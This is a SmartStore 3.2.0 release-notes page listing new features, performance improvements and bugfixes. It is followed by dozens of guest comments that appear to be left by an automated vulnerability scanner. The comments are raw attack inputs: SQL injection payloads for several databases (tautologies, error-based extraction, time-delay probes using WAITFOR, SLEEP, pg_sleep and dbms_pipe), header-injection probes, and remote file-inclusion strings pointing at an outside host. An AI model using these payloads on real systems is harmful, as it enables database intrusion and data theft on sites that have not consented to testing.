Saturday, May 11, 2019

SmartStore version 3.2.0

Highlights

  • (NEW) Page Builder: Create fascinating content that will boost your sales. No coding is required thanks to a powerful WYSIWYG editor which utilizes the revolutionary CSS Grid system (commercial plugin)
  • (NEW) Menu Builder: Visual manager for all sorts of menus. Change existing menus or create your own and place them anywhere you want.
  • (Perf) Faster MegaSearch thanks to Lucene.NET 4.8
  • (Perf) Huge performance increase in discount resolution and calculation.

New Features

  • EmailReminder:
    • Reminders for open shopping carts
    • Reminders for product reviews
    • Reminders to visit the shop after a long absence
  • Scheduling
    • Task execution history
    • Web farms: tasks can run decidedly on each machine of a web farm
    • #1144 MegaSearch: multi server search index
  • Topics & Pages
    • Access control lists
    • Grid paging & filtering
    • New properties: added IsPublished, Short Title (link text) and Intro (teaser) properties.
    • #1542: added options to set body CSS class and Html Id.
  • MegaSearch:
    • Supports searching for forum posts.
    • #1172 Option to display related search terms on search page.
    • Command to continue a previously aborted search index rebuild.
  • Import/export of:
    • Product tags
    • Tier prices
    • Product attribute options
    • Product attribute combinations (update only)
  • Forum:
    • Added option to display a captcha on forum pages when creating or replying to a topic.
    • #417 Restrict forum groups to specific customer roles.
    • Added published property to forum topic and post.
    • Added voting for forum posts.
    • Several performance improvements.
  • BeezUp:
    • #1459 Add option to only submit one category name per product
    • Allow to specify export categories per product
  • Santander:
    • Added payment method for instalment purchase.
    • Added financing calculator.
  • Updated icon library to Font Awesome 5 Free with the possibility to activate pro version in the frontend.
  • New storefront catalog options: ShowSubCategoriesInSubPages, ShowDescriptionInSubPages & IncludeFeaturedProductsInSubPages (Subpage = List index > 1 or any active filter).
  • New security option: Use invisible reCAPTCHA
  • Wallet: Allow customer to choose whether refund should be submitted to his wallet.
  • Added option to display preview pictures in product lists
  • Added option to add multiple file versions to product download section
  • Added options for alternating price display (in badges)
  • Customer avatar: Letter with colored background if no avatar image was uploaded.
  • Viveum: Supports payment via "Virtual Account Brands" (e.g. PayPal).
  • Added options for alternating price display (in badges).
  • #1515 Poll: Add result tab with a list of answers and customers for a poll
  • BMEcat: Added export and import of product tags.
  • Web-API: Added endpoints for ProductSpecificationAttribute.
  • Trusted Shops: Added new Trustbadge display for mobile devices
  • (Dev) Added sm:EfCommandTimeout setting to web.config (was 30 sec. fixed, now configurable)

Improvements

  • (Perf) Significantly increased query performance for products with a lot of category assignments (> 10).
  • (Perf) Increased app startup speed by up to 20%.
  • (Perf) Ultra-fast file-based XML sitemap generation for extremely large catalogs (> 1M)
    • At least 10x faster
    • Generated files are saved on the hard disk now: a rebuild after an app restart is no longer necessary.
    • No exclusive locks during rebuilds anymore: if an (outdated) file already exists, it is returned instantly.
  • (Dev) Enhanced pub/sub: new IConsumer marker interface for classes that contain one or more event message handlers. The generic IConsumer<T> implements IConsumer but has been marked as Obsolete.
  • Better protection against XSS attacks
  • Updated to Bootstrap version 4.1.3
  • Debitoor:
    • Partially update customer instead of full update to avoid all fields being overwritten.
    • #1540 Place company name in front of customer name (according to address format of the particular country).
    • #1565 Add a button to manually create a draft invoice.
  • #1479 Show in messages the delivery time at the time of purchase
  • #1184 Sort current shopping carts & current wishlists by ShoppingCartItem.CreatedOn.
  • #1106 BMECat: import & export support for product keywords
  • #1499 Added hint to forms indicating that fields with an asterisk (*) are required
  • Added filter for newsletter subscriber export by working language
  • Refactored download section
  • Enhanced EntityPicker to pick from customers, manufacturers & categories
  • #1510 Breadcrumb of an associated product should include the grouped product if it has no assigned categories.
  • OpenTrans: added customer number to parties
  • Do not filter cookie using resources if cookie usage has not yet been consented to.
  • #1563 QueuedMessagesClearTask: add a setting for the age of the mails to be deleted.
  • #1569 Added a setting to show login note if no prices are displayed due to customer group permissions.
  • PayPal PLUS: Up to 10 more third party payment methods are allowed by PayPal now.
  • #1560 Tell-a-Friend and anonymous user: render alert box and tell guest to login to use this function
  • #1571 Compare products now shows all specification attribute options
  • #1539 Signing in is now allowed with e-mail and username
  • Trusted Shops: Trustbadge won't be displayed in Popups & Iframes anymore
  • #1461 Admin Grid: filter dialog will be displayed entirely even when grid has no data to display
  • Lots of minor enhancements for both frontend and admin theme
  • Many other minor improvements

Bugfixes

  • In a multi-store environment, multiple topics with the same system name can now be resolved reliably.
  • GMC:
    • Export the product images if no attribute images are defined
    • Do not export the first image twice for additional images
    • Export image URL of full size image (not default size) for additional images
    • Custom labels are now being exported
  • Media middleware: 0-byte files should be treated as missing.
  • Megamenu alpha/omega blends do now toggle correctly on touch devices
  • Summernote HTML editor exceeds parent container width when CodeMirror is activated
  • Only display a zero search hits warning if at least one filter is activated
  • #1436 Do not display delivery time in customer order completed messages
  • "ArgumentNullException: The value must not be NULL" if a topic is password protected
  • Tax by region: Fixes after inserting a tax rate country column shows "Unavailable"
  • #1014 Switching to default language keeps specific URL alias of current page
  • Shipping by total: When inserting a record the country now will be saved
  • #1460 Editing of the customer title was missing on customer and address pages in the backend
  • #1447 Checkout button payment methods (Amazon, PayPal Express) won't work in conjunction with mandatory checkout attributes
  • Fixed Autofac circularity error
  • When creating a topic, the widget zone input has shown System.String[]
  • Switching the language always redirected to the home page if SEO friendly URLs was deactivated.
  • File upload of a checkout attribute was not stored on cart page.
  • Redirecting within checkout may have displayed an incorrect URL in the browser.
  • Server cannot modify cookies after HTTP headers have been sent.
  • Wrong base price on product and cart page when a special price is active.
  • In a multi-store, message templates may have loaded the wrong disclaimer and conditions-of-use text.
  • NullReferenceException in manufacturer list when there is no manufacturer.
  • Wrong order of featured products on category page.
  • #1504 Cart item price calculation was wrong if attribute combinations with text types were involved.
  • #1485 Dropdown list for product sorting didn't not work with Internet Explorer 11.
  • #1468 Twitter authentication wasn't working anymore.
  • Newsletter subscription didn't work when customer privacy setting DisplayGdprConsentOnForms was turned off
  • Fixed social media image detection
  • Fixed redirection of bots when several languages were active
  • Region cannot be selected in checkout when entering a billing or shipping address
  • Fixed invalid conversion of "System.Int32" to "SmartStore.Core.Domain.Tax.VatNumberStatus" when placing an order
  • MegaMenu: Improved item rendering for third tier elements
  • Product display order on category and manufacturer pages was sometimes wrong when using linq search.
  • Debitoor: Wrong invoice total if a subtotal discount has been applied.
  • Import: Fixes invalid conversion "System.Double" to "SmartStore.Core.Domain.Catalog.QuantityControlType".
  • Topics: Fixes "Cannot insert duplicate key row in object 'dbo.UrlRecord' with unique index 'IX_UrlRecord_Slug'".
  • #1566 Santander: eliminate the 1 cent rounding difference at amountTotalNet.
  • Fixed redirection to the homepage for pages which are loaded while the application is restarted.
  • #1570 Filter option "Only deactivated customers" filters deleted instead of deactivated customers.
  • #1475 select boxes must be wrapped on mobile devices if data-select-url is set
  • Fixed the redirection to the homepage for pages which were loaded while the application was restarted
  • Fixes product feeds expect a different base price formatting.
  • #1369 Shopping cart shows "Discount code applied", although it is not applied due to a lower tier price.
  • Many other fixes...
Leave your comment

Comments (83)

G
6 months ago | Guest
3


3

G
6 months ago | Guest
3

3

G
6 months ago | Guest
3

hTTp://r87.com/n

G
6 months ago | Guest
3

1 OR 1=1

G
6 months ago | Guest
3

http://r87.com/n?.php

G
6 months ago | Guest
3

1 OR 1=1

G
6 months ago | Guest
3

'

G
6 months ago | Guest
3

http://r87.com/n?.php

G
6 months ago | Guest
3

NS
NO

G
6 months ago | Guest
3

php://filter//resource=http://r87.com/n?.php

G
6 months ago | Guest
3

r87.com/n

G
6 months ago | Guest
3


AND 'NS='ss

G
6 months ago | Guest
3


ns:netsparker056650=vuln

G
6 months ago | Guest
3


' OR 1=1 OR 'ns'='ns

G
6 months ago | Guest
3

http://example.com/?
ns: netsparker056650=vuln

G
6 months ago | Guest
3

1 OR 17-7=10

G
6 months ago | Guest
3


OR X='ss

G
6 months ago | Guest
3


' OR 1=1 OR '1'='1

G
6 months ago | Guest
3


' OR 1=1 OR '1'='1

G
6 months ago | Guest
3

ns:netsparker056650=vuln

G
6 months ago | Guest
3

1 OR 1=1

G
6 months ago | Guest
3

1 OR 1=1

G
6 months ago | Guest
3


ns:netsparker056650=vuln

G
6 months ago | Guest
3

'

G
6 months ago | Guest
3

NS
NO

G
6 months ago | Guest
3


AND 'NS='ss

G
6 months ago | Guest
3


' OR 1=1 OR 'ns'='ns

G
6 months ago | Guest
3

1 OR 17-7=10

G
6 months ago | Guest
3


OR X='ss

G
6 months ago | Guest
3


' OR 1=1 OR '1'='1

G
6 months ago | Guest
3


' OR 1=1 OR '1'='1

G
6 months ago | Guest
3

%27

G
6 months ago | Guest
3

(select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)

G
6 months ago | Guest
3

'+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'

G
6 months ago | Guest
3

convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))

G
6 months ago | Guest
3

'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='

G
6 months ago | Guest
3

-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)

G
6 months ago | Guest
3

-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

G
6 months ago | Guest
3

-1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"

G
6 months ago | Guest
3

(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))

G
6 months ago | Guest
3

cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)

G
6 months ago | Guest
3

'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'

G
6 months ago | Guest
3

(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)

G
6 months ago | Guest
3

NSFTW

G
6 months ago | Guest
3

'+NSFTW+'

G
6 months ago | Guest
3

(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)

G
6 months ago | Guest
3

-1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

G
6 months ago | Guest
3

-1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1

G
6 months ago | Guest
3

1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1

G
6 months ago | Guest
3

(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))

G
6 months ago | Guest
3

'||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'

G
6 months ago | Guest
3

'+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'

G
6 months ago | Guest
3

' WAITFOR DELAY '0:0:25'--

G
6 months ago | Guest
3

1 WAITFOR DELAY '0:0:25'--

G
6 months ago | Guest
3

WAITFOR DELAY '0:0:25'--

G
6 months ago | Guest
3

1) WAITFOR DELAY '0:0:25'--

G
6 months ago | Guest
3

') WAITFOR DELAY '0:0:25'--

G
6 months ago | Guest
3

')) WAITFOR DELAY '0:0:25'--

G
6 months ago | Guest
3

1)) WAITFOR DELAY '0:0:25'--

G
6 months ago | Guest
3

1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--

G
6 months ago | Guest
3

1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--

G
6 months ago | Guest
3

1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--

G
6 months ago | Guest
3

syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--

G
6 months ago | Guest
3


+ ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*/

G
6 months ago | Guest
3

-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1

G
6 months ago | Guest
3

((select sleep(25)))a-- 1

G
6 months ago | Guest
3

(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual)

G
6 months ago | Guest
3

1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || '

G
6 months ago | Guest
3

1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1

G
6 months ago | Guest
3


';SELECT pg_sleep(25)--

G
6 months ago | Guest
3


;SELECT pg_sleep(25)--

G
6 months ago | Guest
3

SELECT pg_sleep(25)--

G
6 months ago | Guest
3


);SELECT pg_sleep(25)--

G
6 months ago | Guest
3


');SELECT pg_sleep(25)--

G
6 months ago | Guest
3


'));SELECT pg_sleep(25)--

G
6 months ago | Guest
3


));SELECT pg_sleep(25)--

G
6 months ago | Guest
3

((SELECT 1 FROM (SELECT SLEEP(25))A))

G
6 months ago | Guest
3

'+((SELECT 1 FROM (SELECT SLEEP(25))A))+'

G
6 months ago | Guest
3

-1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+'

G
6 months ago | Guest
3

-1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))

G
6 months ago | Guest
3

-1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+"

G
6 months ago | Guest
3


3

G
6 months ago | Guest
3

3